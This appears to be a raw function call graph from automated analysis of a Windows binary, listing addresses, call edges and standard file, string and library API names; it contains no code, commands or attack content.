101039 3e0db6 Mailbox 59 API calls 101036->101039 101040 3e0db6 Mailbox 59 API calls 101037->101040 101038 42d178 101302 3c9b3c 59 API calls 101038->101302 101044 42d29a 101039->101044 101045 42d263 101040->101045 101050 3c7667 59 API calls 101044->101050 101044->101054 101046 42d274 101045->101046 101048 3c7667 59 API calls 101045->101048 101305 43fbce 59 API calls 2 library calls 101046->101305 101048->101046 101049 42d13a 101052 3c7de1 59 API calls 101049->101052 101050->101054 101053 42d147 101052->101053 101301 423a2a 63 API calls Mailbox 101053->101301 101054->100970 101056->101015 101056->101054 101057 42d150 Mailbox 101057->101038 101390 43cadd 101058->101390 101060 43df33 101060->100970 101501 3c9a98 101061->101501 101065 3e0db6 Mailbox 59 API calls 101066 3d1ff4 101065->101066 101069 3d2004 101066->101069 101529 3c57a6 60 API calls Mailbox 101066->101529 101067 406585 101068 3d2029 101067->101068 101533 42f574 59 API calls 101067->101533 101078 3d2036 101068->101078 101534 3c9b3c 59 API calls 101068->101534 101071 3c9837 84 API calls 101069->101071 101073 3d2012 101071->101073 101075 3c57f6 67 API calls 101073->101075 101074 4065cd 101077 4065d5 101074->101077 101074->101078 101076 3d2021 101075->101076 101076->101067 101076->101068 101532 3c58ba CloseHandle 101076->101532 101535 3c9b3c 59 API calls 101077->101535 101079 3c5cdf 2 API calls 101078->101079 101082 3d203d 101079->101082 101083 4065e7 101082->101083 101084 3d2057 101082->101084 101086 3e0db6 Mailbox 59 API calls 101083->101086 101085 3c7667 59 API calls 101084->101085 101087 3d205f 101085->101087 101088 4065ed 101086->101088 101514 3c5572 101087->101514 101092 406601 101088->101092 101536 3c5850 ReadFile SetFilePointerEx 101088->101536 101095 406605 _memmove 101092->101095 101537 4276c4 59 API calls 2 library calls 101092->101537 101093 3d206e 101093->101095 101530 3c9a3c 59 API calls Mailbox 101093->101530 101096 3d2082 Mailbox 101097 3d20bc 101096->101097 101098 3c5c6f CloseHandle 101096->101098 101097->100970 101099 3d20b0 101098->101099 101099->101097 101531 3c58ba CloseHandle 101099->101531 101102 3c7667 59 API calls 101101->101102 101103 43c2f4 101102->101103 101104 3c7667 59 API calls 101103->101104 101105 43c2fc 101104->101105 101106 3c7667 59 API calls 101105->101106 101107 43c304 101106->101107 101108 3c9837 84 API calls 101107->101108 101132 43c312 101108->101132 101109 3c7924 59 API calls 101109->101132 101110 3c7bcc 59 API calls 101110->101132 101111 43c4fb 101112 43c528 Mailbox 101111->101112 101577 3c9a3c 59 API calls Mailbox 101111->101577 101112->100970 101114 43c4e2 101116 3c7cab 59 API calls 101114->101116 101115 3c8047 59 API calls 101115->101132 101118 43c4ef 101116->101118 101117 43c4fd 101119 3c7cab 59 API calls 101117->101119 101121 3c7b2e 59 API calls 101118->101121 101122 43c50c 101119->101122 101120 3c7e4f 59 API calls 101124 43c3a9 CharUpperBuffW 101120->101124 101121->101111 101125 3c7b2e 59 API calls 101122->101125 101123 3c7e4f 59 API calls 101126 43c469 CharUpperBuffW 101123->101126 101575 3c843a 68 API calls 101124->101575 101125->101111 101576 3cc5a7 69 API calls 2 library calls 101126->101576 101129 3c9837 84 API calls 101129->101132 101130 3c7cab 59 API calls 101130->101132 101131 3c7b2e 59 API calls 101131->101132 101132->101109 101132->101110 101132->101111 101132->101112 101132->101114 101132->101115 101132->101117 101132->101120 101132->101123 101132->101129 101132->101130 101132->101131 101134 427962 101133->101134 101135 3e0db6 Mailbox 59 API calls 101134->101135 101136 427970 101135->101136 101137 42797e 101136->101137 101138 3c7667 59 API calls 101136->101138 101137->100970 101138->101137 101140 43bcb0 101139->101140 101141 43bc96 101139->101141 101579 43a213 59 API calls Mailbox 101140->101579 101578 429e4a 89 API calls 4 library calls 101141->101578 101144 43bcbb 101145 3c9ea0 340 API calls 101144->101145 101146 43bd1c 101145->101146 101147 43bca8 Mailbox 101146->101147 101148 43bdae 101146->101148 101152 43bd5d 101146->101152 101147->100970 101149 43be04 101148->101149 101150 43bdb4 101148->101150 101149->101147 101151 3c9837 84 API calls 101149->101151 101601 42791a 59 API calls 101150->101601 101153 43be16 101151->101153 101580 4272df 59 API calls Mailbox 101152->101580 101155 3c7e4f 59 API calls 101153->101155 101159 43be3a CharUpperBuffW 101155->101159 101156 43bdd7 101602 3c5d41 59 API calls Mailbox 101156->101602 101158 43bd8d 101581 3cf460 101158->101581 101163 43be54 101159->101163 101162 43bddf Mailbox 101603 3cfce0 341 API calls 2 library calls 101162->101603 101164 43bea7 101163->101164 101166 43be5b 101163->101166 101165 3c9837 84 API calls 101164->101165 101168 43beaf 101165->101168 101604 4272df 59 API calls Mailbox 101166->101604 101605 3c9e5d 60 API calls 101168->101605 101171 43be89 101172 3cf460 340 API calls 101171->101172 101172->101147 101173 43beb9 101173->101147 101174 3c9837 84 API calls 101173->101174 101175 43bed4 101174->101175 101606 3c5d41 59 API calls Mailbox 101175->101606 101177 43bee4 101607 3cfce0 341 API calls 2 library calls 101177->101607 102737 4160c0 101179->102737 101181 41618c 101181->100970 101182->100966 101183->100966 101184->100970 101185->100981 101186->100971 101187->100944 101188->100970 101189->100952 101191 3c805a 101190->101191 101192 3c8052 101190->101192 101191->100964 102742 3c7f77 59 API calls 2 library calls 101192->102742 101194->100978 101195->100978 101196->100978 101197->100964 101198->100965 101199->100964 101200->101006 101201->101006 101202->100999 101203->101004 101204->101010 101205->101004 101207 3c984b 101206->101207 101208 3c9851 101206->101208 101224 3c57f6 101207->101224 101209 3ff5d3 __i64tow 101208->101209 101210 3c9899 101208->101210 101214 3c9857 __itow 101208->101214 101215 3ff4da 101208->101215 101306 3e3698 83 API calls 4 library calls 101210->101306 101213 3e0db6 Mailbox 59 API calls 101216 3c9871 101213->101216 101214->101213 101217 3e0db6 Mailbox 59 API calls 101215->101217 101219 3ff552 Mailbox _wcscpy 101215->101219 101216->101207 101218 3c7de1 59 API calls 101216->101218 101220 3ff51f 101217->101220 101218->101207 101307 3e3698 83 API calls 4 library calls 101219->101307 101221 3e0db6 Mailbox 59 API calls 101220->101221 101222 3ff545 101221->101222 101222->101219 101223 3c7de1 59 API calls 101222->101223 101223->101219 101308 3c5c6f 101224->101308 101228 3c5821 101232 3c5844 101228->101232 101320 3c5610 101228->101320 101230 3c5833 101337 3c527b SetFilePointerEx SetFilePointerEx 101230->101337 101232->101030 101232->101031 101233 3c583a 101233->101232 101234 3fdc07 101233->101234 101338 42345a SetFilePointerEx SetFilePointerEx WriteFile 101234->101338 101236 3fdc37 101236->101232 101237->101013 101239 3c7667 59 API calls 101238->101239 101240 3c45b1 101239->101240 101241 3c7667 59 API calls 101240->101241 101242 3c45b9 101241->101242 101243 3c7667 59 API calls 101242->101243 101244 3c45c1 101243->101244 101245 3c7667 59 API calls 101244->101245 101246 3c45c9 101245->101246 101247 3c45fd 101246->101247 101248 3fd4d2 101246->101248 101249 3c784b 59 API calls 101247->101249 101250 3c8047 59 API calls 101248->101250 101251 3c460b 101249->101251 101252 3fd4db 101250->101252 101253 3c7d2c 59 API calls 101251->101253 101254 3c7d8c 59 API calls 101252->101254 101255 3c4615 101253->101255 101257 3c4640 101254->101257 101256 3c784b 59 API calls 101255->101256 101255->101257 101259 3c4636 101256->101259 101260 3c465f 101257->101260 101272 3c4680 101257->101272 101274 3fd4fb 101257->101274 101262 3c7d2c 59 API calls 101259->101262 101374 3c79f2 101260->101374 101261 3c4691 101265 3c46a3 101261->101265 101268 3c8047 59 API calls 101261->101268 101262->101257 101263 3fd5cb 101266 3c7bcc 59 API calls 101263->101266 101269 3c46b3 101265->101269 101270 3c8047 59 API calls 101265->101270 101284 3fd588 101266->101284 101268->101265 101273 3c8047 59 API calls 101269->101273 101275 3c46ba 101269->101275 101270->101269 101271 3c784b 59 API calls 101271->101272 101361 3c784b 101272->101361 101273->101275 101274->101263 101276 3fd5b4 101274->101276 101283 3fd532 101274->101283 101277 3c8047 59 API calls 101275->101277 101286 3c46c1 Mailbox 101275->101286 101276->101263 101278 3fd59f 101276->101278 101277->101286 101281 3c7bcc 59 API calls 101278->101281 101279 3fd590 101280 3c7bcc 59 API calls 101279->101280 101280->101284 101281->101284 101282 3c79f2 59 API calls 101282->101284 101283->101279 101287 3fd57b 101283->101287 101284->101272 101284->101282 101377 3c7924 59 API calls 2 library calls 101284->101377 101286->101032 101288 3c7bcc 59 API calls 101287->101288 101288->101284 101290 3fec6b 101289->101290 101291 3c7b40 101289->101291 101385 417bdb 59 API calls _memmove 101290->101385 101379 3c7a51 101291->101379 101294 3c7b4c 101294->101038 101298 423c37 101294->101298 101295 3fec75 101296 3c8047 59 API calls 101295->101296 101297 3fec7d Mailbox 101296->101297 101386 42445a GetFileAttributesW 101298->101386 101301->101057 101302->101056 101303->101018 101304->101054 101305->101054 101306->101214 101307->101209 101309 3c5c88 101308->101309 101310 3c5802 101308->101310 101309->101310 101311 3c5c8d CloseHandle 101309->101311 101312 3c5c99 101310->101312 101311->101310 101313 3fdd58 101312->101313 101314 3c5cb2 CreateFileW 101312->101314 101315 3fdd5e CreateFileW 101313->101315 101317 3c5cd4 101313->101317 101314->101317 101316 3fdd84 101315->101316 101315->101317 101339 3c5aee 101316->101339 101317->101228 101321 3c562b 101320->101321 101322 3fdba5 101320->101322 101323 3c5aee 2 API calls 101321->101323 101336 3c56ba 101321->101336 101322->101336 101355 3c5cdf 101322->101355 101324 3c564d 101323->101324 101325 3c522e 59 API calls 101324->101325 101327 3c5657 101325->101327 101327->101322 101328 3c5664 101327->101328 101329 3e0db6 Mailbox 59 API calls 101328->101329 101330 3c566f 101329->101330 101331 3c522e 59 API calls 101330->101331 101332 3c567a 101331->101332 101349 3c5bc0 101332->101349 101335 3c5aee 2 API calls 101335->101336 101336->101230 101337->101233 101338->101236 101346 3c5b08 101339->101346 101340 3c5b8f SetFilePointerEx 101347 3c5c4e SetFilePointerEx 101340->101347 101341 3fdd28 101348 3c5c4e SetFilePointerEx 101341->101348 101344 3c5b63 101344->101317 101345 3fdd42 101346->101340 101346->101341 101346->101344 101347->101344 101348->101345 101350 3c5c33 101349->101350 101354 3c5bce 101349->101354 101360 3c5c4e SetFilePointerEx 101350->101360 101351 3c56a7 101351->101335 101353 3c5c06 ReadFile 101353->101351 101353->101354 101354->101351 101354->101353 101356 3c5aee 2 API calls 101355->101356 101357 3c5d00 101356->101357 101358 3c5aee 2 API calls 101357->101358 101359 3c5d14 101358->101359 101359->101336 101360->101354 101362 3c785a 101361->101362 101363 3c78b7 101361->101363 101362->101363 101364 3c7865 101362->101364 101365 3c7d2c 59 API calls 101363->101365 101366 3feb09 101364->101366 101367 3c7880 101364->101367 101371 3c7888 _memmove 101365->101371 101368 3c8029 59 API calls 101366->101368 101378 3c7f27 59 API calls Mailbox 101367->101378 101370 3feb13 101368->101370 101372 3e0db6 Mailbox 59 API calls 101370->101372 101371->101261 101373 3feb33 101372->101373 101375 3c7e4f 59 API calls 101374->101375 101376 3c4669 101375->101376 101376->101271 101376->101272 101377->101284 101378->101371 101380 3c7a85 _memmove 101379->101380 101381 3c7a5f 101379->101381 101380->101294 101380->101380 101381->101380 101382 3e0db6 Mailbox 59 API calls 101381->101382 101383 3c7ad4 101382->101383 101384 3e0db6 Mailbox 59 API calls 101383->101384 101384->101380 101385->101295 101387 423c3e 101386->101387 101388 424475 FindFirstFileW 101386->101388 101387->101038 101387->101049 101388->101387 101389 42448a FindClose 101388->101389 101389->101387 101391 3c9837 84 API calls 101390->101391 101392 43cb1a 101391->101392 101415 43cb61 Mailbox 101392->101415 101428 43d7a5 101392->101428 101394 43cdb9 101395 43cf2e 101394->101395 101400 43cdc7 101394->101400 101478 43d8c8 92 API calls Mailbox 101395->101478 101398 43cf3d 101398->101400 101401 43cf49 101398->101401 101399 3c9837 84 API calls 101418 43cbb2 Mailbox 101399->101418 101441 43c96e 101400->101441 101401->101415 101406 43ce00 101456 3e0c08 101406->101456 101409 43ce33 101463 3c92ce 101409->101463 101410 43ce1a 101462 429e4a 89 API calls 4 library calls 101410->101462 101413 43ce25 GetCurrentProcess TerminateProcess 101413->101409 101415->101060 101418->101394 101418->101399 101418->101415 101460 43fbce 59 API calls 2 library calls 101418->101460 101461 43cfdf 61 API calls 2 library calls 101418->101461 101419 43cfa4 101419->101415 101424 43cfb8 FreeLibrary 101419->101424 101421 43ce6b 101475 43d649 107 API calls _free 101421->101475 101424->101415 101427 43ce7c 101427->101419 101476 3c8d40 59 API calls Mailbox 101427->101476 101477 3c9d3c 60 API calls Mailbox 101427->101477 101479 43d649 107 API calls _free 101427->101479 101429 3c7e4f 59 API calls 101428->101429 101430 43d7c0 CharLowerBuffW 101429->101430 101480 41f167 101430->101480 101434 3c7667 59 API calls 101435 43d7f9 101434->101435 101436 3c784b 59 API calls 101435->101436 101437 43d810 101436->101437 101439 3c7d2c 59 API calls 101437->101439 101438 43d858 Mailbox 101438->101418 101440 43d81c Mailbox 101439->101440 101440->101438 101487 43cfdf 61 API calls 2 library calls 101440->101487 101442 43c989 101441->101442 101446 43c9de 101441->101446 101443 3e0db6 Mailbox 59 API calls 101442->101443 101445 43c9ab 101443->101445 101444 3e0db6 Mailbox 59 API calls 101444->101445 101445->101444 101445->101446 101447 43da50 101446->101447 101448 43dc79 Mailbox 101447->101448 101455 43da73 _strcat _wcscpy __wsetenvp 101447->101455 101448->101406 101449 3c9b3c 59 API calls 101449->101455 101450 3c9be6 59 API calls 101450->101455 101451 3c9b98 59 API calls 101451->101455 101452 3e571c 58 API calls __crtLCMapStringA_stat 101452->101455 101453 3c9837 84 API calls 101453->101455 101455->101448 101455->101449 101455->101450 101455->101451 101455->101452 101455->101453 101490 425887 61 API calls 2 library calls 101455->101490 101457 3e0c1d 101456->101457 101458 3e0cb5 VirtualProtect 101457->101458 101459 3e0c83 101457->101459 101458->101459 101459->101409 101459->101410 101460->101418 101461->101418 101462->101413 101464 3c92d6 101463->101464 101465 3e0db6 Mailbox 59 API calls 101464->101465 101466 3c92e4 101465->101466 101467 3c92f0 101466->101467 101491 3c91fc 59 API calls Mailbox 101466->101491 101469 3c9050 101467->101469 101492 3c9160 101469->101492 101471 3c905f 101472 3e0db6 Mailbox 59 API calls 101471->101472 101473 3c90fb 101471->101473 101472->101473 101473->101427 101474 3c8d40 59 API calls Mailbox 101473->101474 101474->101421 101475->101427 101476->101427 101477->101427 101478->101398 101479->101427 101481 41f192 __wsetenvp 101480->101481 101482 41f1d1 101481->101482 101485 41f1c7 101481->101485 101486 41f278 101481->101486 101482->101434 101482->101440 101485->101482 101488 3c78c4 61 API calls 101485->101488 101486->101482 101489 3c78c4 61 API calls 101486->101489 101487->101438 101488->101485 101489->101486 101490->101455 101491->101467 101493 3c9169 Mailbox 101492->101493 101494 3ff19f 101493->101494 101499 3c9173 101493->101499 101495 3e0db6 Mailbox 59 API calls 101494->101495 101497 3ff1ab 101495->101497 101496 3c917a 101496->101471 101499->101496 101500 3c9c90 59 API calls Mailbox 101499->101500 101500->101499 101502 3ff7d6 101501->101502 101504 3c9aa8 101501->101504 101503 3ff7e7 101502->101503 101505 3c7bcc 59 API calls 101502->101505 101506 3c7d8c 59 API calls 101503->101506 101508 3e0db6 Mailbox 59 API calls 101504->101508 101505->101503 101507 3ff7f1 101506->101507 101511 3c9ad4 101507->101511 101513 3c7667 59 API calls 101507->101513 101509 3c9abb 101508->101509 101509->101507 101510 3c9ac6 101509->101510 101510->101511 101512 3c7de1 59 API calls 101510->101512 101511->101065 101511->101067 101512->101511 101513->101511 101515 3c557d 101514->101515 101516 3c55a2 101514->101516 101515->101516 101520 3c558c 101515->101520 101517 3c7d8c 59 API calls 101516->101517 101518 42325e 101517->101518 101522 42328d 101518->101522 101538 4231fa ReadFile SetFilePointerEx 101518->101538 101539 3c7924 59 API calls 2 library calls 101518->101539 101540 3c5ab8 101520->101540 101522->101093 101528 42339c Mailbox 101528->101093 101529->101069 101530->101096 101531->101097 101532->101067 101533->101067 101534->101074 101535->101082 101536->101092 101537->101095 101538->101518 101539->101518 101541 3e0db6 Mailbox 59 API calls 101540->101541 101542 3c5acb 101541->101542 101543 3e0db6 Mailbox 59 API calls 101542->101543 101544 3c5ad7 101543->101544 101545 3c54d2 101544->101545 101552 3c58cf 101545->101552 101547 3c5bc0 2 API calls 101549 3c54e3 101547->101549 101548 3c5514 101548->101528 101551 3c77da 61 API calls Mailbox 101548->101551 101549->101547 101549->101548 101559 3c5a7a 101549->101559 101551->101528 101553 3fdc3c 101552->101553 101554 3c58e0 101552->101554 101568 415ecd 59 API calls Mailbox 101553->101568 101554->101549 101556 3fdc46 101557 3e0db6 Mailbox 59 API calls 101556->101557 101558 3fdc52 101557->101558 101560 3fdcee 101559->101560 101561 3c5a8e 101559->101561 101574 415ecd 59 API calls Mailbox 101560->101574 101569 3c59b9 101561->101569 101564 3c5a9a 101564->101549 101565 3fdcf9 101566 3e0db6 Mailbox 59 API calls 101565->101566 101567 3fdd0e _memmove 101566->101567 101568->101556 101570 3c59d1 101569->101570 101572 3c59ca _memmove 101569->101572 101571 3e0db6 Mailbox 59 API calls 101570->101571 101573 3fdc7e 101570->101573 101571->101572 101572->101564 101573->101573 101574->101565 101575->101132 101576->101132 101577->101112 101578->101147 101579->101144 101580->101158 101582 3cf4ba 101581->101582 101583 3cf650 101581->101583 101584 3cf4c6 101582->101584 101585 40441e 101582->101585 101586 3c7de1 59 API calls 101583->101586 101608 3cf290 101584->101608 101587 43bc6b 341 API calls 101585->101587 101592 3cf58c Mailbox 101586->101592 101589 40442c 101587->101589 101593 3cf630 101589->101593 101722 429e4a 89 API calls 4 library calls 101589->101722 101591 3cf4fd 101591->101589 101591->101592 101591->101593 101597 423c37 3 API calls 101592->101597 101623 43445a 101592->101623 101632 43df37 101592->101632 101635 42cb7a 101592->101635 101715 3c4e4a 101592->101715 101593->101147 101595 3cf5e3 101595->101593 101721 3c9c90 59 API calls Mailbox 101595->101721 101597->101595 101601->101156 101602->101162 101603->101147 101604->101171 101605->101173 101606->101177 101607->101147 101609 3cf43a 101608->101609 101611 3cf2bc 101608->101611 101724 429e4a 89 API calls 4 library calls 101609->101724 101611->101609 101620 3cf2f9 _memmove 101611->101620 101612 3cf3d3 101613 3cf3e3 101612->101613 101723 43a2d9 85 API calls Mailbox 101612->101723 101613->101591 101615 3e0db6 59 API calls Mailbox 101615->101620 101616 4043f9 101726 3cf6a3 341 API calls 101616->101726 101617 3c9ea0 341 API calls 101617->101620 101619 4043a9 101619->101591 101620->101612 101620->101615 101620->101616 101620->101617 101620->101619 101621 4043ab 101620->101621 101725 429e4a 89 API calls 4 library calls 101621->101725 101624 3c9837 84 API calls 101623->101624 101625 434494 101624->101625 101727 3c6240 101625->101727 101627 4344a4 101628 4344c9 101627->101628 101629 3c9ea0 341 API calls 101627->101629 101630 3c9a98 59 API calls 101628->101630 101631 4344cd 101628->101631 101629->101628 101630->101631 101631->101595 101633 43cadd 130 API calls 101632->101633 101634 43df47 101633->101634 101634->101595 101636 3c7667 59 API calls 101635->101636 101637 42cbaf 101636->101637 101638 3c7667 59 API calls 101637->101638 101639 42cbb8 101638->101639 101640 42cbcc 101639->101640 101898 3c9b3c 59 API calls 101639->101898 101642 3c9837 84 API calls 101640->101642 101643 42cbe9 101642->101643 101644 42cd1a Mailbox 101643->101644 101645 42ccea 101643->101645 101646 42cc0b 101643->101646 101644->101595 101765 3c4ddd 101645->101765 101647 3c9837 84 API calls 101646->101647 101649 42cc17 101647->101649 101650 3c8047 59 API calls 101649->101650 101655 42cc23 101650->101655 101651 42cd16 101651->101644 101654 3c7667 59 API calls 101651->101654 101653 3c4ddd 136 API calls 101653->101651 101656 42cd4b 101654->101656 101658 42cc37 101655->101658 101659 42cc69 101655->101659 101657 3c7667 59 API calls 101656->101657 101660 42cd54 101657->101660 101661 3c8047 59 API calls 101658->101661 101662 3c9837 84 API calls 101659->101662 101663 3c7667 59 API calls 101660->101663 101664 42cc47 101661->101664 101665 42cc76 101662->101665 101666 42cd5d 101663->101666 101667 3c7cab 59 API calls 101664->101667 101668 3c8047 59 API calls 101665->101668 101669 3c7667 59 API calls 101666->101669 101670 42cc51 101667->101670 101671 42cc82 101668->101671 101672 42cd66 101669->101672 101674 3c9837 84 API calls 101670->101674 101899 424a31 GetFileAttributesW 101671->101899 101673 3c9837 84 API calls 101672->101673 101676 42cd73 101673->101676 101677 42cc5d 101674->101677 101680 3c459b 59 API calls 101676->101680 101681 3c7b2e 59 API calls 101677->101681 101678 42cc8b 101679 42cc9e 101678->101679 101682 3c79f2 59 API calls 101678->101682 101684 3c9837 84 API calls 101679->101684 101690 42cca4 101679->101690 101683 42cd8e 101680->101683 101681->101659 101682->101679 101685 3c79f2 59 API calls 101683->101685 101686 42cccb 101684->101686 101687 42cd9d 101685->101687 101900 4237ef 75 API calls Mailbox 101686->101900 101689 42cdd1 101687->101689 101691 3c79f2 59 API calls 101687->101691 101692 3c8047 59 API calls 101689->101692 101690->101644 101693 42cdae 101691->101693 101694 42cddf 101692->101694 101693->101689 101697 3c7bcc 59 API calls 101693->101697 101695 3c7b2e 59 API calls 101694->101695 101696 42cded 101695->101696 101698 3c7b2e 59 API calls 101696->101698 101699 42cdc3 101697->101699 101700 42cdfb 101698->101700 101701 3c7bcc 59 API calls 101699->101701 101702 3c7b2e 59 API calls 101700->101702 101701->101689 101703 42ce09 101702->101703 101704 3c9837 84 API calls 101703->101704 101705 42ce15 101704->101705 101789 424071 101705->101789 101707 42ce26 101708 423c37 3 API calls 101707->101708 101709 42ce30 101708->101709 101710 3c9837 84 API calls 101709->101710 101713 42ce61 101709->101713 101711 42ce4e 101710->101711 101843 429155 101711->101843 101714 3c4e4a 84 API calls 101713->101714 101714->101644 101716 3c4e5b 101715->101716 101717 3c4e54 101715->101717 101719 3c4e6a 101716->101719 101720 3c4e7b FreeLibrary 101716->101720 101718 3e53a6 __fcloseall 83 API calls 101717->101718 101718->101716 101719->101595 101720->101719 101721->101595 101722->101593 101723->101613 101724->101619 101725->101619 101726->101619 101752 3c7a16 101727->101752 101729 3c6265 101730 3c646a 101729->101730 101735 3fdff6 101729->101735 101736 3c7d8c 59 API calls 101729->101736 101737 3c750f 59 API calls 101729->101737 101744 3c6799 _memmove 101729->101744 101745 3fdf92 101729->101745 101749 3c7e4f 59 API calls 101729->101749 101757 3c5f6c 60 API calls 101729->101757 101758 3c5d41 59 API calls Mailbox 101729->101758 101760 3c5e72 60 API calls 101729->101760 101761 3c7924 59 API calls 2 library calls 101729->101761 101759 3c750f 59 API calls 2 library calls 101730->101759 101732 3c6484 Mailbox 101732->101627 101762 41f8aa 91 API calls 4 library calls 101735->101762 101736->101729 101737->101729 101741 3fe004 101763 3c750f 59 API calls 2 library calls 101741->101763 101743 3fe01a 101743->101732 101764 41f8aa 91 API calls 4 library calls 101744->101764 101746 3c8029 59 API calls 101745->101746 101747 3fdf9d 101746->101747 101751 3e0db6 Mailbox 59 API calls 101747->101751 101750 3c643b CharUpperBuffW 101749->101750 101750->101729 101751->101744 101753 3e0db6 Mailbox 59 API calls 101752->101753 101754 3c7a3b 101753->101754 101755 3c8029 59 API calls 101754->101755 101756 3c7a4a 101755->101756 101756->101729 101757->101729 101758->101729 101759->101732 101760->101729 101761->101729 101762->101741 101763->101743 101764->101732 101901 3c4bb5 101765->101901 101770 3c4e08 LoadLibraryExW 101911 3c4b6a 101770->101911 101771 3fd8e6 101773 3c4e4a 84 API calls 101771->101773 101774 3fd8ed 101773->101774 101776 3c4b6a 3 API calls 101774->101776 101778 3fd8f5 101776->101778 101937 3c4f0b 101778->101937 101779 3c4e2f 101779->101778 101780 3c4e3b 101779->101780 101782 3c4e4a 84 API calls 101780->101782 101784 3c4e40 101782->101784 101784->101651 101784->101653 101786 3fd91c 101945 3c4ec7 101786->101945 101790 42408d 101789->101790 101791 424092 101790->101791 101792 4240a0 101790->101792 101793 3c8047 59 API calls 101791->101793 101794 3c7667 59 API calls 101792->101794 101795 42409b Mailbox 101793->101795 101796 4240a8 101794->101796 101795->101707 101797 3c7667 59 API calls 101796->101797 101798 4240b0 101797->101798 101799 3c7667 59 API calls 101798->101799 101800 4240bb 101799->101800 101801 3c7667 59 API calls 101800->101801 101802 4240c3 101801->101802 101803 3c7667 59 API calls 101802->101803 101804 4240cb 101803->101804 101805 3c7667 59 API calls 101804->101805 101806 4240d3 101805->101806 101807 3c7667 59 API calls 101806->101807 101808 4240db 101807->101808 101809 3c7667 59 API calls 101808->101809 101810 4240e3 101809->101810 101811 3c459b 59 API calls 101810->101811 101812 4240fa 101811->101812 101813 3c459b 59 API calls 101812->101813 101814 424113 101813->101814 101815 3c79f2 59 API calls 101814->101815 101816 42411f 101815->101816 101817 424132 101816->101817 101819 3c7d2c 59 API calls 101816->101819 101818 3c79f2 59 API calls 101817->101818 101820 42413b 101818->101820 101819->101817 101821 42414b 101820->101821 101822 3c7d2c 59 API calls 101820->101822 101823 3c8047 59 API calls 101821->101823 101822->101821 101824 424157 101823->101824 101825 3c7b2e 59 API calls 101824->101825 101826 424163 101825->101826 102372 424223 59 API calls 101826->102372 101828 424172 102373 424223 59 API calls 101828->102373 101830 424185 101831 3c79f2 59 API calls 101830->101831 101832 42418f 101831->101832 101833 4241a6 101832->101833 101834 424194 101832->101834 101836 3c79f2 59 API calls 101833->101836 101835 3c7cab 59 API calls 101834->101835 101837 4241a1 101835->101837 101838 4241af 101836->101838 101841 3c7b2e 59 API calls 101837->101841 101839 4241cd 101838->101839 101840 3c7cab 59 API calls 101838->101840 101842 3c7b2e 59 API calls 101839->101842 101840->101837 101841->101839 101842->101795 101844 429162 __ftell_nolock 101843->101844 101845 3e0db6 Mailbox 59 API calls 101844->101845 101846 4291bf 101845->101846 101847 3c522e 59 API calls 101846->101847 101848 4291c9 101847->101848 101849 428f5f GetSystemTimeAsFileTime 101848->101849 101850 4291d4 101849->101850 101851 3c4ee5 85 API calls 101850->101851 101852 4291e7 _wcscmp 101851->101852 101853 42920b 101852->101853 101854 4292b8 101852->101854 102404 429734 101853->102404 101856 429734 96 API calls 101854->101856 101858 429284 _wcscat 101856->101858 101861 3c4f0b 74 API calls 101858->101861 101862 4292c1 101858->101862 101860 429239 _wcscat _wcscpy 102411 3e40fb 58 API calls __wsplitpath_helper 101860->102411 101863 4292dd 101861->101863 101862->101713 101864 3c4f0b 74 API calls 101863->101864 101865 4292ed 101864->101865 101866 3c4f0b 74 API calls 101865->101866 101868 429308 101866->101868 101869 3c4f0b 74 API calls 101868->101869 101870 429318 101869->101870 101871 3c4f0b 74 API calls 101870->101871 101872 429333 101871->101872 101873 3c4f0b 74 API calls 101872->101873 101874 429343 101873->101874 101875 3c4f0b 74 API calls 101874->101875 101876 429353 101875->101876 101877 3c4f0b 74 API calls 101876->101877 101878 429363 101877->101878 102374 4298e3 GetTempPathW GetTempFileNameW 101878->102374 101880 42936f 101881 3e525b 115 API calls 101880->101881 101892 429380 101881->101892 101882 42943a 102388 3e53a6 101882->102388 101884 429445 101886 42944b DeleteFileW 101884->101886 101887 42945f 101884->101887 101885 3c4f0b 74 API calls 101885->101892 101886->101862 101888 429505 CopyFileW 101887->101888 101893 429469 _wcsncpy 101887->101893 101889 42951b DeleteFileW 101888->101889 101890 42952d DeleteFileW 101888->101890 101889->101862 102401 4298a2 CreateFileW 101890->102401 101892->101862 101892->101882 101892->101885 102375 3e4863 101892->102375 102412 428b06 101893->102412 101897 4294f4 DeleteFileW 101897->101862 101898->101640 101899->101678 101900->101690 101950 3c4c03 101901->101950 101904 3c4bec FreeLibrary 101905 3c4bf5 101904->101905 101908 3e525b 101905->101908 101906 3c4c03 2 API calls 101907 3c4bdc 101906->101907 101907->101904 101907->101905 101954 3e5270 101908->101954 101910 3c4dfc 101910->101770 101910->101771 102112 3c4c36 101911->102112 101914 3c4b8f 101915 3c4baa 101914->101915 101916 3c4ba1 FreeLibrary 101914->101916 101918 3c4c70 101915->101918 101916->101915 101917 3c4c36 2 API calls 101917->101914 101919 3e0db6 Mailbox 59 API calls 101918->101919 101920 3c4c85 101919->101920 101921 3c522e 59 API calls 101920->101921 101922 3c4c91 _memmove 101921->101922 101923 3c4ccc 101922->101923 101925 3c4d89 101922->101925 101926 3c4dc1 101922->101926 101924 3c4ec7 69 API calls 101923->101924 101929 3c4cd5 101924->101929 102116 3c4e89 CreateStreamOnHGlobal 101925->102116 102127 42991b 95 API calls 101926->102127 101930 3c4f0b 74 API calls 101929->101930 101932 3c4d69 101929->101932 101933 3fd8a7 101929->101933 102122 3c4ee5 101929->102122 101930->101929 101932->101779 101934 3c4ee5 85 API calls 101933->101934 101935 3fd8bb 101934->101935 101936 3c4f0b 74 API calls 101935->101936 101936->101932 101938 3c4f1d 101937->101938 101939 3fd9cd 101937->101939 102151 3e55e2 101938->102151 101942 429109 102349 428f5f 101942->102349 101944 42911f 101944->101786 101946 3c4ed6 101945->101946 101947 3fd990 101945->101947 102354 3e5c60 101946->102354 101949 3c4ede 101951 3c4bd0 101950->101951 101952 3c4c0c LoadLibraryA 101950->101952 101951->101906 101951->101907 101952->101951 101953 3c4c1d GetProcAddress 101952->101953 101953->101951 101956 3e527c __setmbcp 101954->101956 101955 3e528f 102003 3e8b28 58 API calls __getptd_noexit 101955->102003 101956->101955 101958 3e52c0 101956->101958 101973 3f04e8 101958->101973 101959 3e5294 102004 3e8db6 9 API calls ___strgtold12_l 101959->102004 101962 3e52c5 101963 3e52ce 101962->101963 101964 3e52db 101962->101964 102005 3e8b28 58 API calls __getptd_noexit 101963->102005 101966 3e5305 101964->101966 101967 3e52e5 101964->101967 101988 3f0607 101966->101988 102006 3e8b28 58 API calls __getptd_noexit 101967->102006 101972 3e529f @_EH4_CallFilterFunc@8 __setmbcp 101972->101910 101974 3f04f4 __setmbcp 101973->101974 101975 3e9c0b __lock 58 